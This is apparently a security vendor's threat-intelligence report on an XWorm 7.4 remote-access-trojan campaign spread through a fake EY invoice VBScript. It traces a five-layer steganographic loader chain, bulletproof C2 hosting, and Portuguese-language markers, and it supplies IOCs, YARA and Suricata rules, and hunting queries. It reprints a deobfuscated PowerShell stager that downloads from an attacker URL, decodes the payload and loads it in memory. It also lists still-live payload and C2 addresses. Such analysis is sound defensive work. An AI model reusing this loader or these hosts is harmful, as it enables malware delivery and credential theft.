highPhishing

XWorm 7.4 Delivered via Fake EY Invoice: Five-Layer Steganography Chain, Portuguese-Speaking Operator, and Bulletproof Hosting in the Seychelles

PublishedMarch 12, 2026

Threat Actors:ProfileAssessment

phishingxwormcredential-theftc2exploitaptspearphishing

TL;DR: A VBScript dropper masquerading as an Ernst & Young invoice (EY Invoice_P1K2317563.vbs) delivers XWorm 7.4 RAT through a five-layer obfuscation chain: Unicode-padded VBS to hex-encoded PowerShell to steganographic PNG downloads to .NET reflective loading to process injection into RegAsm.exe. The operator -- likely Portuguese-speaking based on steganography markers ("INICIO" / "FIM") -- uses a cluster of co-hosted image upload domains for payload delivery and parks their C2 on Omegatech LTD bulletproof hosting in the Seychelles. The C2 domain evaultbuzzfix[.]com has been active since September 2025, and the secondary steganographic payload image was still live at time of analysis.

The Lure: Big Four Brand Impersonation

The attack begins with what appears to be a routine accounts payable attachment: EY Invoice_P1K2317563.vbs. The invoice number format is realistic enough to pass a quick glance from a finance department staffer accustomed to processing Big Four consulting invoices. The .vbs extension is the only immediate red flag -- and in environments where script execution is not blocked at the email gateway, that single oversight is all the operator needs.

The file itself is 1.1MB -- abnormally large for a VBScript. Of its 16,163 lines, only 33 are functional. The remaining 16,130 lines are junk padding designed to frustrate analyst review and bypass file-size heuristics in sandbox environments.

Property	Value
Filename	`EY Invoice_P1K2317563.vbs`
SHA-256	`a0134fc7c275aa80e90f2fec7bb474bb5c83ab195070ba98f15756f8de0b666f`
SHA-1	`e28ffe319accfc6c1505ca77d2e711ee262941b9`
MD5	`834854f74060926baf5d2c46d14030a8`
Size	1,160,434 bytes
Lines	16,163 total (33 functional, 16,130 junk)
Obfuscation	Two distinct Unicode separator strings inserted between characters

The Five-Layer Kill Chain

[EY Invoice Email]
       |
       v
[EY Invoice_P1K2317563.vbs]  (1.1MB, Unicode obfuscated)
       |
       v
[WMI Process Create] --> powershell.exe -NoProfile -WindowStyle Hidden
       |
       v
[Download PNG 1: pngup.com/rv2N/optimized_MSI.png]
       |  (steganographic image -- .NET Fiber loader)
       v
[Extract between "IN-" and "-in1" markers]
[Replace # with A, Reverse, Base64 decode]
       |
       v
[Fiber.Program .NET loader via AppDomain.Load()]
       |
       v
[Download PNG 2: djfancy.ct.ws/img_184040.png]
       |  (2.3MB steganographic JPEG)
       v
[Extract XWorm PE between "INICIO==" and "FIM" markers]
[Replace # with A, Reverse, Base64 decode]
       |
       v
[XWorm 7.4 injected into RegAsm.exe]
       |
       v
[C2 beacon: evaultbuzzfix.com:6000 (158.94.210.122)]

Layer 0: VBScript Dropper

The VBS file uses a clever obfuscation technique: two distinct Unicode separator strings are injected between every meaningful character in the code. After stripping these separators, the functional payload emerges -- a WMI-based process launcher that invokes PowerShell through winmgmts:root\cimv2 -> Win32_Process.Create. This is T1047 (WMI) chained with T1059.005 (VBScript) -- the WMI execution breaks the direct parent-child process relationship between wscript.exe and powershell.exe, complicating EDR detection rules that look for direct VBS-to-PowerShell spawning.

Layer 1: PowerShell Stager

The decoded PowerShell (1,358 bytes) performs a single critical function: downloading a steganographic PNG from the operator's image upload infrastructure and extracting a .NET assembly from it.

# Reconstructed logic (deobfuscated)
$img = (New-Object Net.WebClient).DownloadData('https://pngup[.]com/rv2N/optimized_MSI.png')
$text = [Text.Encoding]::UTF8.GetString($img)
$start = $text.IndexOf('IN-') + 3
$end = $text.IndexOf('-in1')
$payload = $text.Substring($start, $end - $start)
$payload = $payload.Replace('#','A')
$reversed = -join ($payload[-1..-($payload.Length)])
$bytes = [Convert]::FromBase64String($reversed)
$assembly = [AppDomain]::CurrentDomain.Load($bytes)
$assembly.GetType('Fiber.Program').GetMethod('Main').Invoke($null, $null)

The extraction logic is identical across both steganographic layers: find payload between markers, replace # with A, reverse the string, Base64-decode. This signature pattern -- the character substitution followed by reversal before Base64 -- is a strong behavioral indicator for this operator's toolkit.

Layer 2: Steganographic Payload Delivery

This is where the campaign gets interesting. The operator uses image steganography twice: first to deliver a .NET loader, then to deliver the final XWorm payload. Both payloads are appended after the JPEG end-of-file marker (FFD9), meaning standard image viewers render the files normally while the malicious content rides silently past content inspection.

The second steganographic image is particularly notable:

Property	Value
URL	`hxxps://djfancy[.]ct[.]ws/img_184040.png`
SHA-256	`6be9f7e34431ab2e44b7cfe513e966ee924e1b0e57da87a65fec23ca05b98ff6`
Size	2,279,412 bytes
Actual Format	JPEG (despite `.png` extension)
Exif Data	Adobe Photoshop CC 2019 (Windows), 2022-05-05
Photoshop Layer Text	"ONE BOARD TO RULE THEM ALL"
Stego Payload	210,103 bytes appended after JPEG FFD9 marker
Markers	`INICIO==` (start) / `FIM` (end) -- Portuguese

The Photoshop metadata indicates the cover image was created in 2022 and later repurposed as a steganographic carrier. The Photoshop layer text "ONE BOARD TO RULE THEM ALL" is likely residual from the original image's context and not operationally significant -- but it is a fingerprint that could help identify other images from the same operator.

This image was still live and serving the XWorm payload at time of analysis.

Layer 3: .NET Reflective Loader (Fiber.Program)

The first steganographic extraction yields a .NET assembly with the namespace Fiber and entry point Fiber.Program.Main(). This loader's sole purpose is to download the second steganographic image, extract the final payload using the Portuguese-language markers, and inject it into a legitimate Windows binary.

Layer 4: XWorm 7.4 RAT

The final payload is XWorm 7.4, injected into RegAsm.exe -- a legitimate .NET assembly registration utility (T1218.009, LOLBin abuse). Running inside RegAsm provides process-level legitimacy and may bypass application whitelisting policies that trust Microsoft-signed binaries.

Property	Value
SHA-256	`bddfbcec70a756033af747d918fd300e0fb0c2bf19c29e993c5605ff1ac82aa1`
MD5	`89daab12baadd9a6d0fddbc897324a76`
Size	157,569 bytes
Family	XWorm 7.4
Variant String	`Harry_XWormClient 7.4 (With statup)`
Assembly GUID	`5e10c103-9b22-4589-96e7-ec225f280`
Language	VB.NET (obfuscated)
C2	`evaultbuzzfix[.]com:6000`
License	KeyAuth commercial builder

The variant string "Harry_XWormClient" suggests the operator handle "Harry" -- likely a pseudonym used within XWorm's commercial licensing ecosystem via KeyAuth. The misspelling "statup" (instead of "startup") is present in the binary itself and serves as a reliable detection string.

XWorm 7.4 capabilities include: remote shell, keylogging (T1056.001), screen capture (T1113), webcam capture (T1125), browser data theft (T1555.003), Outlook exploitation (T1114.001), USB spreading (T1091), AES-encrypted C2 (T1573), DDoS, and arbitrary file operations.

Infrastructure: Stego Delivery Cluster and Bulletproof C2

The PNG Upload Cluster

Three image upload domains share a single OVH server and a single Let's Encrypt certificate -- a strong indicator of common ownership:

pngup[.]com
uppng[.]com
pngupload[.]com

All three resolve to 149.56.126.37 (OVH, AS16276). The shared Let's Encrypt certificate (serial 0533c5e49f1967dc1f994c177b416a2bebdc) covers all three domains plus their www. variants. Certificate Transparency logs show 17+ certificates issued to this cluster since April 2025, indicating sustained operational use.

At time of analysis, the primary stego delivery URL (hxxps://pngup[.]com/rv2N/optimized_MSI.png) returned HTTP 502 -- the payload had been pulled or the backend crashed. But the secondary delivery at djfancy[.]ct[.]ws remained fully live.

The Secondary Delivery: Free Hosting

The djfancy[.]ct[.]ws domain is hosted on iFastNet's free hosting platform (Byet.org) at 185.27.134.153. Free hosting services are a recurring pattern in commodity malware delivery -- they require no payment information, offer minimal abuse response, and can be spun up in minutes. Port 27015 open on this server suggests it may also serve as a gaming server, consistent with a shared hosting environment.

The C2: Bulletproof Hosting in the Seychelles

The XWorm C2 at 158.94.210.122 is the most significant infrastructure indicator. It sits within a /24 allocation owned by Omegatech LTD, a known bulletproof hosting provider registered in the Seychelles.

Omegatech LTD (Seychelles)
  abuse: abuse@omegatech.sc
  MNT:   omegatechsc-mnt
  Upstream LIR: lir-tr-mgn-1-MNT (Turkish)
  ASN:   AS214943 (RAILNET)
    |
    +-- 158.94.210.0/24 (OMEGATECH allocation)
          |
          +-- 158.94.210.122 (XWorm C2)
                Ports: 135/RPC, 445/SMB, 3389/RDP, 5985/WinRM, 6000/XWorm
                Status: CVE-2020-0796 (SMBGhost) VULNERABLE

The open port profile tells a story: this is a Windows server with RDP, WinRM, SMB, and RPC exposed -- an administration profile consistent with a manually managed C2 server rather than an automated deployment. The SMBGhost vulnerability (CVE-2020-0796) indicates the server is running an unpatched build of Windows 10 or Server, which is ironic but typical for bulletproof infrastructure where the operator prioritizes anonymity over their own server security.

The Turkish upstream LIR (Local Internet Registry) is notable -- Omegatech LTD operates from the Seychelles but routes through Turkish infrastructure, a common pattern for BPH providers seeking jurisdictional arbitrage.

Domain Timeline

The C2 domain evaultbuzzfix[.]com has a longer history than the current campaign:

Date	Event
2024-01-19	First certificate (Sectigo) for `form.evaultbuzzfix.com`
2024-04-25	`pngup[.]com` registered (DropCatch/NameBright)
2025-04-06	`evaultbuzzfix[.]com` re-registered via NameCheap
2025-08-04	First Let's Encrypt cert for pngup cluster
2025-09-08	`evaultbuzzfix[.]com` first reported as XWorm C2
2025-09-19	Omegatech IP allocation created
2026-01-28	`158.94.210.122:6000` reported as XWorm C2
2026-03-09	EY Invoice VBS dropper first seen

The Sectigo certificate for form.evaultbuzzfix.com in January 2024 predates the malware use by over a year, suggesting the domain was either acquired from a previous owner or repurposed from an earlier project. The April 2025 re-registration via NameCheap and simultaneous migration to Cloudflare marks the beginning of the current malicious operation. A wildcard certificate (*.evaultbuzzfix.com) in CT logs indicates the operator may be running additional subdomains beyond what has been observed.

This C2 has been publicly reported as an XWorm server since September 2025 -- six months of continuous operation with no takedown.

Threat Actor Profile

Attribution Indicators

Indicator	Assessment
Language	Portuguese (INICIO/FIM steganography markers)
Region	Likely Brazil or Portugal
Handle	"Harry" (XWorm variant string)
Motivation	Financial (credential theft, RAT access)
Sophistication	MEDIUM-HIGH
Tooling	Commercial XWorm builder via KeyAuth license
Confidence	MEDIUM

The Portuguese-language steganography markers are the strongest linguistic indicator. "INICIO" (beginning) and "FIM" (end) are standard Portuguese, not Spanish (which would use "INICIO" and "FIN"). This narrows the operator's likely origin to Brazil or Portugal. The use of a commercial XWorm builder through KeyAuth suggests the operator is a customer of the XWorm ecosystem rather than its developer -- a buyer leveraging off-the-shelf RAT capabilities with custom delivery infrastructure.

MITRE ATT&CK Mapping

Tactic	Technique	ID	Implementation
Initial Access	Phishing: Spearphishing Attachment	T1566.001	EY Invoice VBS email attachment
Execution	Command and Scripting Interpreter: VBScript	T1059.005	Unicode-obfuscated VBS dropper
Execution	Command and Scripting Interpreter: PowerShell	T1059.001	Hidden PowerShell stager (1,358 bytes)
Execution	Windows Management Instrumentation	T1047	WMI process creation breaks parent-child chain
Persistence	Boot or Logon Autostart: Startup Folder	T1547.001	`Xwin.lnk` in Startup folder
Defense Evasion	Obfuscated Files or Information	T1027	Unicode separator padding (16,130 junk lines)
Defense Evasion	Obfuscated Files or Information: Steganography	T1027.003	Dual steganographic JPEG payload delivery
Defense Evasion	Deobfuscate/Decode Files or Information	T1140	Multi-layer decode: hex, base64, string reversal
Defense Evasion	Masquerading	T1036	EY brand impersonation
Defense Evasion	Signed Binary Proxy Execution: RegAsm	T1218.009	XWorm injected into RegAsm.exe LOLBin
Defense Evasion	Process Injection	T1055	Payload injection into RegAsm.exe
Credential Access	Credentials from Password Stores: Web Browsers	T1555.003	Browser credential and cookie theft
Credential Access	Input Capture: Keylogging	T1056.001	XWorm keylogger module
Collection	Screen Capture	T1113	XWorm screen capture capability
Collection	Video Capture	T1125	XWorm webcam capture
Collection	Email Collection: Local Email Collection	T1114.001	Outlook data exploitation
Lateral Movement	Replication Through Removable Media	T1091	USB spreading capability
Command and Control	Non-Standard Port	T1571	C2 on port 6000
Command and Control	Encrypted Channel	T1573	AES-encrypted C2 communications

Indicators of Compromise

Network Indicators

# C2
evaultbuzzfix[.]com
158.94.210.122:6000

# Stego Delivery -- Primary Cluster
pngup[.]com
uppng[.]com
pngupload[.]com
149.56.126.37

# Stego Delivery -- Secondary
djfancy[.]ct[.]ws
185.27.134.153

# Payload URLs (defanged)
hxxps://pngup[.]com/rv2N/optimized_MSI[.]png
hxxps://djfancy[.]ct[.]ws/img_184040[.]png

# License Server
keyauth[.]win

File Indicators

File	SHA-256
VBS Dropper	`a0134fc7c275aa80e90f2fec7bb474bb5c83ab195070ba98f15756f8de0b666f`
Stego JPEG	`6be9f7e34431ab2e44b7cfe513e966ee924e1b0e57da87a65fec23ca05b98ff6`
XWorm 7.4 PE	`bddfbcec70a756033af747d918fd300e0fb0c2bf19c29e993c5605ff1ac82aa1`

Host-Based Indicators

# Persistence
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\Xwin.lnk

# Drop path
C:\Users\Public\Downloads\

# Process chain
wscript.exe -> [WMI] -> powershell.exe -> RegAsm.exe

# Strings in memory
Harry_XWormClient 7.4 (With statup)
5e10c103-9b22-4589-96e7-ec225f280
INICIO==
FIM

Detection Opportunities

YARA Rules

rule XWorm_EY_Invoice_VBS_Dropper {
    meta:
        description = "Detects EY Invoice VBS dropper with Unicode separator obfuscation"
        author = "Breakglass Intelligence"
        date = "2026-03-09"
        tlp = "TLP:WHITE"
        severity = "HIGH"
        reference = "https://intel.breakglass.tech"
    strings:
        $vbs_wmi = "winmgmts" ascii wide nocase
        $vbs_process = "Win32_Process" ascii wide nocase
        $vbs_create = ".Create" ascii wide nocase
        $ps_hidden = "-WindowStyle Hidden" ascii wide nocase
        $ps_noprofile = "-NoProfile" ascii wide nocase
    condition:
        filesize > 1000000 and
        all of them
}

rule XWorm_Stego_Portuguese_Markers {
    meta:
        description = "Detects steganographic payloads with Portuguese INICIO/FIM markers"
        author = "Breakglass Intelligence"
        date = "2026-03-09"
        tlp = "TLP:WHITE"
        severity = "HIGH"
    strings:
        $inicio = "INICIO==" ascii
        $fim = "FIM" ascii
        $jpeg_end = { FF D9 }
    condition:
        $jpeg_end and
        $inicio and $fim and
        @inicio > @jpeg_end
}

rule XWorm_74_Harry_Variant {
    meta:
        description = "Detects XWorm 7.4 Harry variant by unique strings"
        author = "Breakglass Intelligence"
        date = "2026-03-09"
        tlp = "TLP:WHITE"
        severity = "CRITICAL"
    strings:
        $variant = "Harry_XWormClient" ascii wide
        $version = "7.4" ascii wide
        $typo = "statup" ascii wide
        $guid = "5e10c103-9b22-4589-96e7-ec225f280" ascii wide
        $mutex = "Xwin" ascii wide
    condition:
        uint16(0) == 0x5A4D and
        2 of them
}

Suricata/Snort Rules

# XWorm C2 beacon on non-standard port
alert tcp $HOME_NET any -> 158.94.210.122 6000 \
  (msg:"XWORM C2 Beacon to evaultbuzzfix BPH"; \
  flow:established,to_server; sid:2026030901; rev:1;)

# DNS lookup for XWorm C2 domain
alert dns $HOME_NET any -> any 53 \
  (msg:"XWORM C2 DNS Lookup evaultbuzzfix.com"; \
  dns.query; content:"evaultbuzzfix.com"; nocase; \
  sid:2026030902; rev:1;)

# Steganographic payload download from pngup cluster
alert http $HOME_NET any -> 149.56.126.37 any \
  (msg:"XWORM Stego Delivery from pngup Cluster"; \
  http_host; content:"pngup"; \
  sid:2026030903; rev:1;)

# Steganographic payload download from djfancy free hosting
alert http $HOME_NET any -> any any \
  (msg:"XWORM Stego Delivery from djfancy Free Host"; \
  http_host; content:"djfancy.ct.ws"; \
  sid:2026030904; rev:1;)

# WMI-spawned PowerShell with hidden window (behavioral)
alert any any any -> any any \
  (msg:"SUSPICIOUS WMI to Hidden PowerShell Execution"; \
  content:"Win32_Process"; content:"powershell"; content:"-WindowStyle"; content:"Hidden"; \
  sid:2026030905; rev:1;)

EDR / SIEM Hunting Queries

RegAsm.exe spawned by PowerShell (process injection indicator):

process_name:"RegAsm.exe" AND parent_process_name:"powershell.exe"

Startup folder persistence (Xwin.lnk):

file_path:"*\\Start Menu\\Programs\\Startup\\Xwin.lnk"

Outbound connections to Omegatech /24 on any port:

dst_ip:"158.94.210.0/24" AND direction:"outbound"

VBS files over 1MB (junk-padded dropper pattern):

file_extension:"vbs" AND file_size:>1000000

WMI process creation from wscript.exe:

process_name:"wmiprvse.exe" AND parent_cmdline:"*wscript*"

Published by Breakglass Intelligence. Investigation conducted 2026-03-09. Secondary steganographic payload confirmed live at time of analysis. C2 infrastructure active for 6+ months with no takedown. Classification: TLP:WHITE